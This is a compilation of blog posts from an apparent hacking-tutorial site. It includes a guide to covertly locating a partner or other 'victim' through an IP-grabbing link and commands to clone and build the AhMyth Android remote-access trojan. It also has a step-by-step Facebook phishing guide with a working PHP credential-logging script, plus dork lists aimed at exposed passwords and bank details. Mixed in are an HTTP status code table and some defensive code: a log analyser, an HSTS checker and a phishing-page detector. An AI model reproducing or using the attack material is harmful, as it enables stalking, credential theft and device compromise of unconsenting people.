All posts by Rushabh Gedam

Know anyone’s location by sending link through message(WhatsApp, Facebook, etc).

Where’s my boy/girlfriend ? Where he/she spend maximum time ? Do you think he/she lied to you ?

Well know about his/her location by sending just a link to them. How is it possible ? There are many services available which are providing such details, we are going to discuss one of the trusted credential provider which is Grabify. It is the worldwide based IP provider. Today we will use Grabify as your primary weapon and later on we will use  IP2LOCATION to get the exact location of our victim.

Steps to get locations :

  • Go to Grabify

You will see the page looks like



Rather than getting confused Enter any available existing live site URL which you want to show to your victims and then click on Create URL.




Now it will create any temporary link which grabs the information of victims. If you are unable to understand jumo to its dashboard, it will automatically jump to the dashboard, no need to do anything.



The URL that has been pasted earlier. And this is the page on which our victim will be redirected.

  1. URL which we will send to our victims.
  2. In the other link you will have options to select other type of URL shortners.
  3. This is the Access token that is used for accessing the our account and regain the session
  4. This is very important link that used to access our session without creating an account on grabify.

Now deceive the intended user/victim to click on the link. Once he/she clicks on the link your important data will start generating. And resultant you can see the Date and time, IP address of the user, Country, service used by user to access the link, whether it was referred by Facebook/Whatsapp/Twitter, etc. As well as you can see the Host name and ISP service provider name.

I tried mine, and successfully got the better result.



Now what about location.

Get that IP address and paste it in IP2LOCATION



Paste that grabbed IP in this search box. Now its done.



This is what we wanted ever. Latitude and Longitude. Now use the Google maps. And get the exact location of the victim.

Note :- Gathering anyone’s information without their permission is illegal, don’t do this even if you are having qualities. I never did this to compromise anyone’s safety. If you want to know anyone’s location just call them and ask about their respective location. #TeamKnowledgeSuttra neither encourages you nor advice you to do such illegitimate things. This is just for knowledge purpose.

 

 

 

 

Internet Response Codes with meaning.

When starting web pentesting, one thing that is often missed is response codes. Today you will learn the exact codes and what they mean. First, go through some example cases.

  1. You fire up the browser but forget to connect to the internet; it will give you a page which looks like this
  2. If you set up a proxy connection but the proxy refuses the connection, then it will prompt as

OK… Now you have an internet connection which responds properly, but even then there are some cases; we will discuss them.

  1. If you type a wrong URL or a wrong address for a website, it will return a page like
  2. If you are able to connect to the internet and something still goes wrong, it is not an end-user problem but a technical issue. It may be a server error, a service provider error, or anything else. It will then return a page in which the server, web domain and problem statement are given. And luckily I would like to mention that our site is well configured and does not have such issues. Let’s get through the codes.

| Sr. No. | Response Code | Meaning |
|---|---|---|
| 1 | 100 | Continue |
| 2 | 101 | Switching Protocols |
| 3 | 102 | Processing |
| 4 | 103 | Checkpoint |
| 5 | 103 | Early Hints |
| 6 | 200 | OK |
| 7 | 201 | Created |
| 8 | 202 | Accepted |
| 9 | 203 | Non-Authoritative Information (since HTTP/1.1) |
| 10 | 204 | No Content |
| 11 | 205 | Reset Content |
| 12 | 206 | Partial Content |
| 13 | 207 | Multi Status |
| 14 | 208 | Already Reported |
| 15 | 218 | This is fine |
| 16 | 226 | IM Used |
| 17 | 300 | Multiple Choices |
| 18 | 301 | Moved Permanently |
| 19 | 302 | Found (which is previously removed) |
| 20 | 303 | See Other |
| 21 | 304 | Not Modified |
| 22 | 305 | Use Proxy (since HTTP/1.1) |
| 23 | 306 | Switch Proxy |
| 24 | 307 | Temporary Redirect |
| 25 | 308 | Permanent Redirect (since HTTP/1.1) |
| 26 | 400 | Bad Request |
| 27 | 401 | Unauthorized Access |
| 28 | 402 | Payment Required |
| 29 | 403 | Forbidden |
| 30 | 404 | Not Found |
| 31 | 405 | Method Not Allowed |
| 32 | 406 | Not Acceptable |
| 33 | 407 | Proxy Authentication Required |
| 34 | 408 | Request Time Out |
| 35 | 409 | Conflict |
| 36 | 410 | Gone |
| 37 | 411 | Length Required |
| 38 | 412 | Precondition Failed |
| 39 | 413 | Payload Too Large |
| 40 | 414 | URI Too Long |
| 41 | 415 | Unsupported Media Type |
| 42 | 416 | Range Not Satisfiable |
| 43 | 417 | Expectation Failed |
| 44 | 418 | I’m a Teapot |
| 45 | 419 | Page Expired |
| 46 | 420 | Method Failure |
| 47 | 420 | Enhance Your Calm |
| 48 | 421 | Misdirected Request |
| 49 | 422 | Unprocessable Entity |
| 50 | 423 | Locked |
| 51 | 424 | Failed Dependency |
| 52 | 426 | Upgrade Required |
| 53 | 428 | Precondition Required |
| 54 | 429 | Too Many Requests |
| 55 | 431 | Request Header Field Too Large |
| 56 | 450 | Blocked by Windows Parental Control |
| 57 | 451 | Unavailable for Legal Reason |
| 58 | 498 | Invalid Token |
| 59 | 499 | Token Required |
| 60 | 500 | Internal Server Error |
| 61 | 501 | Not Implemented |
| 62 | 502 | Bad Gateway |
| 63 | 503 | Service Unavailable |
| 64 | 504 | Gateway Timeout |
| 65 | 505 | HTTP Version Not Supported |
| 66 | 506 | Variant Also Negotiates |
| 67 | 507 | Insufficient Storage |
| 68 | 508 | Loop Detected |
| 69 | 509 | Bandwidth Limit Exceeded |
| 70 | 510 | Not Extended |
| 71 | 511 | Network Authentication Required |
| 72 | 520 | Unknown Error (Cloudflare) |
| 73 | 521 | Web Server is Down (Cloudflare) |
| 74 | 522 | Connection Timed Out (Cloudflare) |
| 75 | 523 | Origin is Unreachable (Cloudflare) |
| 76 | 524 | A Timeout Occurred (Cloudflare) |
| 77 | 525 | SSL Handshake Failed (Cloudflare) |
| 78 | 526 | Invalid SSL Certificate (Cloudflare) |
| 79 | 527 | Railgun Error (Cloudflare) |
| 80 | 530 | Site is Frozen |
| 81 | 530 | Origin DNS Error (Cloudflare) |
| 82 | 598 | Network Read Timeout Error |

Once you have gone through this, you might see that the codes fall into a sequence of series, i.e. 1XX, 2XX, 3XX, 4XX, 5XX.

1xx (Informational):

The request was received, continuing process

2xx (Successful):

The request was successfully received, understood, and accepted

3xx (Redirection):

Further action needs to be taken in order to complete the request

4xx (Client Error):

The request contains bad syntax or cannot be fulfilled

5xx (Server Error):

The server failed to fulfill an apparently valid request
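
The class rule above is what makes status codes useful in log review. The following is an added example, not code from the original post: it groups web server log lines by status class and flags clients whose requests are mostly 4xx. The log lines are constructed, and the thresholds in `noisy_clients` are assumptions chosen for the sample.

```python
import re
from collections import Counter, defaultdict

# The five classes listed above, keyed by the first digit of the code.
STATUS_CLASSES = {1: "Informational", 2: "Successful", 3: "Redirection",
                  4: "Client Error", 5: "Server Error"}

# Common Log Format: client ident user [time] "request" status size
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+'
)

# Constructed sample lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Oct/2023:13:55:36 +0000] "GET / HTTP/1.1" 200 5120',
    '192.0.2.10 - - [10/Oct/2023:13:55:37 +0000] "GET /logo.png HTTP/1.1" 304 0',
    '192.0.2.10 - - [10/Oct/2023:13:55:40 +0000] "GET /old HTTP/1.1" 301 178',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /page-a HTTP/1.1" 404 153',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /page-b HTTP/1.1" 403 153',
    '198.51.100.7 - - [10/Oct/2023:13:56:02 +0000] "GET /page-c HTTP/1.1" 404 153',
    '198.51.100.7 - - [10/Oct/2023:13:56:02 +0000] "GET /page-d HTTP/1.1" 401 153',
    '198.51.100.7 - - [10/Oct/2023:13:56:03 +0000] "GET / HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Oct/2023:13:57:10 +0000] "POST /api HTTP/1.1" 500 312',
    '203.0.113.5 - - [10/Oct/2023:13:57:12 +0000] "GET / HTTP/1.1" 200 5120',
    'truncated line with no status',
]


def status_class(code):
    """Map a numeric status code to its class name, or 'Unknown'."""
    return STATUS_CLASSES.get(code // 100, "Unknown")


def summarise(lines):
    """Return (overall class counts, per-client class counts, unparsable lines)."""
    overall = Counter()
    per_client = defaultdict(Counter)
    rejected = []
    for line in lines:
        match = LOG_LINE.match(line)
        if not match:
            rejected.append(line)  # keep bad lines visible instead of dropping them
            continue
        cls = status_class(int(match.group("status")))
        overall[cls] += 1
        per_client[match.group("client")][cls] += 1
    return overall, per_client, rejected


def noisy_clients(per_client, min_requests=4, error_ratio=0.75):
    """Clients whose traffic is mostly 4xx, as seen with scanners or broken links."""
    flagged = []
    for client, counts in per_client.items():
        total = sum(counts.values())
        if total >= min_requests and counts["Client Error"] / total >= error_ratio:
            flagged.append(client)
    return sorted(flagged)


if __name__ == "__main__":
    overall, per_client, rejected = summarise(SAMPLE_LOG)
    print(dict(overall), noisy_clients(per_client), len(rejected))
```
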

Identifying Gathered Data : Whois Records

In the previous blog we learned about some tools which allow us to gather information about websites. As the last blog was all about information gathering on a website, in this blog we will go through understanding the gathered data, which is essential for hacking purposes. We will go through the WHOIS records of a website. But before that, take the permission of the website owner.

Go to http://whois.domaintools.com/

It will look like the above image.

As I am concerned with my website, I will show you some information regarding my website.

Let’s go through the entities one by one.

Domain profile

In the domain profile you can see the most relevant information about the website and its domain name provider, as well as domain registrar info. Go through this. Let me remind you again: without the owner’s permission don’t try anything malicious, or else it will land you in jail.

Now If you go through the next listed tab which gives information about website

Response code 500 which means website is responsive, and alive also.

SEO score also best about 97%. And Seven hundred and fifty eight terms included.

And now its time for something unethical. If you generate the report and finds any bug, exploit it. But carefully we are very much attentive about that, if you finds anything convey us. And now search about your victims.

In the next lecture we will study about www.robtex.com

Information Gathering Online Tools

Hello everyone, welcome to knowledgesuttra. Today we are going to discuss online tools which help with information gathering. There are various tools available online for information gathering for hacking, but some of them are more popular than others. Let’s have a reminder that hacking is a crime unless and until you have the permission of the owner. Scanning a website is also a crime, so do everything with the owner’s permission.

Lets get to the tools.

Nmap :-

NMAP is a Kali Linux based tool, but its web version is also available, so there is no need to configure Kali on your machine. If you haven’t heard about Kali Linux, kindly go through it.

Also read:- Top Mostly Used Pro Hacking Tools For Kali Linux

Back to nmap. Go to https://nmap.org.

Insert the IP address or domain name. And press Enter or click on search.

Zenmap is an alternative to nmap; Zenmap is GUI based whereas nmap is command based. There is no other difference between the two.

Now the other well known tool which gives more information about the victims website/domain.

Whois :-

As the name suggests, this online portal gives information about the domain registration: for how long, from which domain provider, and much more.

Go to http://whois.domaintools.com/

and enter your victims domain name/IP. And get maximum information about servers used, which OS is loaded on server, how many time it switched the location, etc.

A less popular but informative online tool known as Robtex.

Robtex :-

The tool is available online and has the ability to determine even a network on the server. This tool is available on https://robtex.com.

This tool is used for data forensics. So before proceeding further kindly take the permissions of your victims.

Robtex uses various sources to gather public information about IP numbers, domain names, host names, autonomous systems, routes etc. It then indexes the data in a big database and provides free access to the data.

All the tools mentioned above are web-based applications which don’t have any dependencies. Hence these tools are useful.

RAT of Hackers : Remote Access Terminal(Trojan)

Hello everyone welcome to knowledgesuttra. Today’s topic is RAT of Hackers. We will see how to use RAT and how it works. RAT is the acronym for Remote Access Trojan(Terminal). It is used for accessing the others(victims) computer without having physical access to them. Yes there are many tools(Trojan) available for the same. Some of them are legal also, in which a hacker will ask their victims to allow access to victim. But those which are not legal allows hacker to directly control the victims PC. Some of the popular and well known RAT are teamviewer, putty, etc. At the windows user end it will prompted as Remote Desktop Protocol.

Let’s see some of the hacker’s RAT that might be usable and easy to understand.

Download and Configure the AhMyth

It is freeware and ready to build the applications. Applications able to install on the Android Mobile Phones. The download and configuration of AhMyth

git clone https://github.com/AhMyth/AhMyth-Android-RAT.git

Then open up it. And move to the directory

cd AhMyth-Android-RAT/AhMyth-Server

If you have Node JS build structure available then go to it by writing

npm start

Then write sudo npm start –unsafe-perm

Great It’s working. With the GUI(Graphical User Interface).

It allows to build standalone APK or an application that can harm other applications so that it will work as Trojan and backdoor also. Backdoor are set to do almost every task of the hackers.

Fight : HTTP vs HTTPS

Hi, welcome to KnowledgeSuttra. Here’s another short fight between two standard browsing protocols. Having prior knowledge of internet browsing with or without security is necessary. For hackers: how to get rid of the SSL layer. Let’s take a deep dive.

Things that you must need to know during web surfing is that

  • Where your Internet Data is going ?
  • Site you are surfing is real or not ?
  • Do that site actually shares private data ?
  • And for hackers how to get rid of SSL layer ?

Let’s get through the soul.




HTTP :-

HTTP is the acronym for Hyper Text Transfer Protocol. This protocol is basically used for the transfer of Web-pages from Web-server to Web-Browser.

HTTPS :-

HTTPS is the acronym for Hyper Text Transfer Protocol Secured. Security plays the best role over the Internet.

Completely know about the above mentioned terms.

Web-pages :-

Web-pages are basically HTML pages which may include JavaScript, Cascading Style Sheets (CSS), Angular JS, or any other coding language for design purposes. These pages are stored on a machine known as the HOST machine. To be accessible through the internet, the HOST must offer its services over the internet, and this is the origin of the name server.

Web-server :-

Web-server is the machine where the Web-pages are stored. To access such pages on the end user’s device (mobile/laptop/desktop/etc.) a browser is needed.

Web-browser :-

The utility used on the end user’s device to access the saved pages from the server is known as a Browser.

What does HTTP exactly do ?

HTTP sends end user queries through the internet to the server, but without encryption.

What does HTTPS exactly do ?

HTTPS sends end user queries through the internet with 128-bit encryption at the user end and the same decryption at the server end. In this way the possibility of a MAN-IN-THE-MIDDLE ATTACK is lower.

How to get rid of SSL ?

The small toolkit/utility well known as SSLSTRIP available for Kali Linux

Coming soon with Guide on SSLSTRIP.
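
On the defending side, a site resists having its SSL layer removed when plain HTTP only redirects to HTTPS and the HTTPS response carries a Strict-Transport-Security (HSTS) header, so returning browsers never use plain HTTP again. HSTS is not covered in the post itself; the following is an added example, not the author’s code, that checks both conditions on constructed responses. The one-year `MIN_MAX_AGE` threshold and the sample headers are assumptions.

```python
from urllib.parse import urlsplit

REDIRECT_CODES = {301, 302, 303, 307, 308}
MIN_MAX_AGE = 31536000  # one year in seconds; threshold assumed for this check


def parse_hsts(value):
    """Parse a Strict-Transport-Security value.

    Returns a dict, or None when the header is malformed (missing or
    non-numeric max-age, or a repeated directive) and would be ignored.
    """
    directives = {}
    for part in value.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, arg = part.partition("=")
        name = name.strip().lower()
        if name in directives:
            return None
        directives[name] = arg.strip().strip('"')
    max_age = directives.get("max-age", "")
    if not (max_age.isascii() and max_age.isdigit()):
        return None
    return {"max_age": int(max_age),
            "include_subdomains": "includesubdomains" in directives}


def assess(http_status, http_headers, https_headers):
    """Return a list of findings; an empty list means both checks passed."""
    findings = []
    http_headers = {k.lower(): v for k, v in http_headers.items()}
    https_headers = {k.lower(): v for k, v in https_headers.items()}

    # Check 1: the plain-HTTP response must do nothing except redirect to HTTPS.
    target = urlsplit(http_headers.get("location", ""))
    if http_status not in REDIRECT_CODES or target.scheme != "https":
        findings.append("plain HTTP does not redirect to HTTPS")

    # Check 2: the redirect alone can be rewritten in transit, so the HTTPS
    # response must also tell the browser to stay on HTTPS.
    raw = https_headers.get("strict-transport-security")
    if raw is None:
        findings.append("no Strict-Transport-Security header")
    else:
        policy = parse_hsts(raw)
        if policy is None:
            findings.append("Strict-Transport-Security header is malformed")
        elif policy["max_age"] < MIN_MAX_AGE:
            findings.append("HSTS max-age is below one year")
    return findings


# Constructed responses for a hypothetical site, example.test.
GOOD_HTTP = (301, {"Location": "https://example.test/"})
GOOD_HTTPS = {"Strict-Transport-Security": "max-age=63072000; includeSubDomains"}
WEAK_HTTP = (200, {"Content-Type": "text/html"})
WEAK_HTTPS = {"Content-Type": "text/html"}

if __name__ == "__main__":
    print(assess(*GOOD_HTTP, GOOD_HTTPS))
    print(assess(*WEAK_HTTP, WEAK_HTTPS))
```
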

Facebook phishing: Complete Guide

Hello everyone welcome to knowledgesuttra. today we are discussing about Facebook phishing. Steps required for making a facebook phishing page. Before proceeding it is respectively mentioned that don’t be malicious.

Create Facebook phishing page

Open facebook.com in your browser.
Then, right click on the website’s login page. You should see an option along the lines of “view source page.” Click on this option and you should be able to view the code behind this page.
Go ahead and Copy all of the page’s source code into Notepad (or your operating system’s best simple text editor).
If using Notepad, hit ctrl F (which is the find hotkey) and search for action.
You should see a line that looks like this: action=”https://www.facebook.com/login.php?login_attempt=1
Delete everything contained in the quotations, and instead fill the quotes with post.php.
Now it should read action=”post.php”Save this file somewhere on your computer with the file name of index.htm.
Omit the final period from the filename. This is going to become your phishing page.
Next, create a new notepad document with the name of post.php.
Omit the final period from the filename.

Copy and paste the following code into this document, and remember to save it:

<?php
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>

At this point, you should now have two files saved: index.htm and post.php.Next, this code actually needs to be uploaded to a web hosting service.
There are free hosting providers.
We’ll be using 000Webhost.After you have signed up for an account, browse to the control panel, and then to file manager.
Once the window opens, go to public_html.
Delete default.php, and then upload index.htm and post.php.
Next, click on a preview of index.htm. As you’ll notice, it should look nearly identical to the Facebook login page.
The URL of this page is what needs to be linked to in an attack. Sometimes attackers imbed this false link on other websites, forums, popup ads, and even emails.
Now go back to the file manage-rand public_html. There should be a file labeled username.txt.Open this file and you should be able to see login credentials that have been entered by a test user.

Don’t be malicious. Be conscious. And hereby we are not responsible for any kind of hacking attempt. Do this at your own risk.
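
The trait that gives such a page away is a login form served from, or posting to, a host that is not the real site. The following is an added example for defenders, not code from the original post, that checks a reported page for this. It assumes the reviewer already knows which brand the page imitates and supplies that brand’s legitimate hosts; the host `login.example.test` and the sample HTML are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class LoginFormFinder(HTMLParser):
    """Record the action attribute of every form that has a password field."""

    def __init__(self):
        super().__init__()
        self.actions = []       # actions of forms containing a password input
        self._action = None     # action of the form currently open, if any
        self._password = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._action, self._password = attrs.get("action") or "", False
        elif tag == "input" and (attrs.get("type") or "").lower() == "password":
            self._password = self._action is not None

    def handle_endtag(self, tag):
        if tag == "form" and self._action is not None:
            if self._password:
                self.actions.append(self._action)
            self._action = None


def check_login_page(page_url, html, legit_hosts):
    """Findings for a login page that should only exist on legit_hosts."""
    finder = LoginFormFinder()
    finder.feed(html)
    finder.close()
    findings = []
    page_host = urlsplit(page_url).hostname or ""
    for action in finder.actions:
        # A relative action such as "post.php" resolves against the page URL.
        target = urljoin(page_url, action)
        parts = urlsplit(target)
        if page_host not in legit_hosts:
            findings.append(f"login form served from {page_host}")
        if (parts.hostname or "") not in legit_hosts:
            findings.append(f"credentials are posted to {target}")
        if parts.scheme != "https":
            findings.append("credentials are posted without TLS")
    return findings


# Exact-match allowlist (assumption: the reviewer lists every legitimate host).
LEGIT_HOSTS = {"facebook.com", "www.facebook.com"}

# Constructed minimal pages: a copy with a rewritten action, and the original form.
CLONE_HTML = """<html><head><title>Log in</title></head><body>
<form id="login_form" action="post.php" method="post">
<input type="text" name="email"><input type="password" name="pass">
</form></body></html>"""
GENUINE_HTML = CLONE_HTML.replace(
    'action="post.php"',
    'action="https://www.facebook.com/login.php?login_attempt=1"')

if __name__ == "__main__":
    for finding in check_login_page("http://login.example.test/index.htm",
                                    CLONE_HTML, LEGIT_HOSTS):
        print(finding)
```
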

STORM v2.5.1 has been released

Hello everyone, welcome to knowledgesuttra. Today we are discussing STORM: what STORM is and what is new in v2.5.1 of STORM.

What is STORM?

STORM is cracking program designed to perform website security testing.

What’s new

– Added FTP Support once again, But this time more light-weight and optimized!

– Added ‘Tested Per Minute’, ‘Total Threads’ and ‘Total Loaded Combo’ Stats.

– Added “HMACSHA1”, “HMACSHA384”, “HMACSHA512”, “HMACMD5” and “HMACRIPEMD160” support for PBKDF2 Hashing. (The Function name also has been changed from “pbkdf2hmacsha256” to “pbkdf2hmac”)

– Added ‘GetBytes’, ‘GetString’, ‘AES’, ‘RSAParameters’ and ‘RSA’ Functions.

– Added ‘Base64’ option for ‘SHA’ and ‘HMAC’ Hashing methods.

– ‘Base64Encode’ And ‘Base64Decode’ Functions now Supports Byte Arrays Inputs!

– Fixed a very rare “It’s time to wait for data from the HTTP server” message on some special pages!

– Fixed the Proxy Authorization was being ignored.

– Fixed an OLD Bug behind the FTP Stages!

– Fixed the worker list position cannot go higher than 4,000,000 and stops at 4 Million list position.

– Fixed a very rare Redirect Location issue (Like the Origin’s SelfLocation header Redirect Infinite Loop)!

– Fixed the Debug Window keeps sending requests in redirect loops even while you have the window closed!

– Fixed the “Cookie: *” functionality.

– Removed the Junk MessageBox on “Delete” button in Debug Form.

Version 2.5.1

– Added “HEX” and “Bytes” Support for “RSA” and “AES” functions output type.

– Fixed Double “Cookie: ” was being sent while you had the cookies in Headers Variable.

– Fixed the “URLEncode”/”URLDecode” function not encoding/decoding some special chars.

This information is given for educational purposes. Use this information at your own risk.

Google’s Syntax(Dorks) : A better way to browse

Google has its own syntax for searching during a browsing session. Google holds as much data as we could want, so grab it by entering exact queries and get exactly the data you wanted.
The Google search engine finds answers to our queries, which is helpful in our daily lives. You can search for your school assignments, reports, presentations and more.
In other words, we can use Google dorks to find vulnerabilities, hidden information and access pages on certain websites. Since Google has a search algorithm and indexes most websites, it can be useful to a hacker for finding vulnerabilities on the target.


The basic syntax for advanced operators in Google is:

operator_name:keyword

For example, this operator_name:keyword syntax can be typed as ‘filetype:xls intext:username’ in the standard search box, which results in a list of Excel files which contain the term ‘Username‘.

Basic Google Dorks Syntax

site –

will return websites on the following domain

allintitle and intitle –

the page title contains the specified phrase

inurl –

restricts the results to URLs containing the specified phrase

filetype –

searches for the specified file type formats

What Information Can We Find Using Google Dorks?

  • Admin login pages
  • Usernames and passwords
  • Vulnerable entities
  • Sensitive documents
  • Govt/military data
  • Email lists
  • Bank account details and lots more

Google Dorks can also be used for network mapping; we’re able to find the subdomains of the target site using simple dorks.

Download what exactly you wanted : Underground Browser

Hi, welcome to KnowledgeSuttra. Most of the time the user wants to download software, files (resumes, documents, Excel sheets, etc.), games, videos, etc. But surfing the web with traditional HTTP (Hyper Text Transfer Protocol) does not give satisfactory results. So there is a need to change from the traditional way to an advanced way.
Let’s have a small introduction to the protocols existing on the Web.

  • HTTP/S :- Hyper Text Transfer Protocol/Secured
  • FTP:- File Transfer Protocol
  • SMTP :- Simple Mail Transfer Protocol
  • TCP/IP :- Transfer Control Protocol
  • UDP :- User Datagram Protocol

These are some of the most important protocols which we face daily.
HTTPS is used for transferring HTML/web pages from host to destination. And whenever we try to download anything from the web, there is a transfer of data which is large in size, and almost every host uses the FTP protocol.
Let’s get to the guide.
Go to browser -> enter the address gegereka.com

The above screen appears before you. Before proceeding, let me introduce you to a very sophisticated way to browse. Check the given image to find the category of what you want to download. Don’t waste time in doing so; jump directly to the next phase, in which the interface will look like Google.


Enter your query. Then click on the Enter.
Great news! We got the exact application which we want to download. But if you notice, the software’s links are not working because there is a small lock present which must be unlocked; only then are you able to download.

How to unlock ?

Click on lock or here given in link.

Oooooooooooooopppsss…!!!!!!!
It asked for the unlock code.
Now next step.
Click on Get the code >>> Button shown below in the gegereka page.

Now you may be worried that giving your actual data could be problematic. So provide fake details which do not exist, as shown in the figure.

But note :- Mail box must include @ and .com as well as correct captcha.

Good news, we got access. Click on Access Granted >>.
Click on any of the software’s link, also there’s option to directly establish connection with host machine’s database, via FTP protocol.

This arrives when we click on connect to database, and if we click on the file, the download will start automatically.
